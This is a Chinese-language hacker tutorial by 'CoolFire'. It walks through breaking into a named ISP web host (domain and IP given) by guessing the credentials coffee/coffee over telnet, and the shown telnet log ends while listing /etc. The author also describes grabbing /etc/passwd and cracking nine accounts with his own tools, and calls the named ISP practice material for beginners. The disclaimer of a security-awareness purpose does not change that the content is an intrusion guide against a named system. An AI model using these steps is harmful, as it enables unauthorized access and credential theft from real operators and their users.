这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果
你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写
这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password 若有人因此文件
导致恶意入侵别人的电脑或网路, 本人概不负责 !!
前几次说到了 Net Coffee 店, 还好他们没有提供客户拨接上线的功能, 不然密码或是帐号被人盗用
的客户不就糗大了! 但是 CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的 W3 密码,
误入一个号称第一个提供网路拨接的 ISP, 且在 CoolFire 顺利的抓回 /etc/passwd 之後, 使用了自己
写的 PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了 9 组 ID 与 Password 相同的密码,
勿怪我没有在这里提醒大家, 还好我没有找到 root password, 不然可能该系统就此停摆, 不可再见
天日也! (当然我不可能这麽作啦!).
看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上 CoolFire 最近开会的时候遇到的情
况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强, 可能到时
候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业 溃! 大家要小心呀 !
ISP 是一般 User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导 User 正确
的网路使用观念 (Password 的设定及 proxy 的使用等), 实在不敢想像这样的网路发展到几年後会
是甚麽样子 ??
这一次的说明还是没有谈到新的技巧, 在 James 将首页更新後各位应该已经可以从中学到许多东
西了, 如果想要学习入侵, 就一定要知道最新的资讯 (入侵本国的网路则不用, 反正没人重视网路
安全..... 真失望), 在别人还没将 Bug 修正之前就抢先一步拿到 /etc/passwd, 所以订阅一些网路安全
的 Mail List 是必要的, 多看一些网安有关的 News Group 也是必要的 (不仅 Hacker 如此, ISP 更要
多注意这些资讯!). 日後有空再整里一些 Mail List 给大家 !!
本次主题: 说明如何连接该 ISP 并且对其 /etc/passwd 解码
连接位址: www.coffee.com.tw (203.66.169.11)
特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以 CoolFire 已经 Mail 给该网页之维
护人员更改密码, 但该网页之 ISP 仍为新手之练习好题材! CoolFire Mail 给该网页维护
人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!
Mail sent to [email protected]:
Subject: 请速更动网页密码
From: CoolFire
1<[email protected]>
2
3你的网页作得不错, 但是因为你所设定的密码太容易为骇客所
4? 入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次
5若网页遭到篡改, 本人概不负责!!
6
7**** 课程开始 ****
8
9请注意: 由於本次所作的课程内容以实作为主, 除了本人 IP 有所更改, 一切都使用本人所用之
10Telnet 软体 Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容, 否则本人概不负责!
11
12(连线到某一主机之後.... 此处的 ms.hinet.net.tw 是假的 Domain name)
13ms.hinet.net.tw> telnet www.coffee.com.tw
14Trying 203.66.169.11...
15Connected to www.coffee.com.tw.
16Escape character is '^]'.
17Password: (随便按一下 Enter)
18Login incorrect
19
20www login: coffee (以 Hacker 的敏锐判断 username=coffee password=coffee)
21Password:
22Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw
23
24欢 迎 光 临 ....... 以下略! 因涉及该 ISP 的名誉, 大家自己去看吧!
25=================================================================
26
27(直接进入核心部份)
28www:~$ cd /etc
29www:/etc$ ls
30DIR_COLORS hosts.equiv printcap
31HOSTNAME hosts.lpd profile
32NETWORKING inet@ protocols
33NNTP_INEWS_DOMAIN inetd.conf psdevtab
34X11@ inittab rc.d/
35at.deny inittab.gettyps.sample resolv.conf
36bootptab ioctl.save rpc
37csh.cshrc issue securetty
38csh.login issue.net securetty.old
39default/ klogd.pid sendmail.cf
40diphosts ld.so.cache sendmail.st
41exports ld.so.conf services
42fastboot lilo/ shells
43fdprm lilo.conf shutdownpid
44fs/ localtime skel/
45fstab magic slip.hosts
46ftp.banner mail.rc slip.login
47ftp.deny motd snooptab
48ftpaccess motd.bak sudoers
49ftpconversions msgs/ syslog.conf
50ftpgroups mtab syslog.pid
51ftpusers mtools termcap
52gateways named.boot ttys
53gettydefs networks utmp@
54group nntpserver vga/
55host.conf</[email protected]>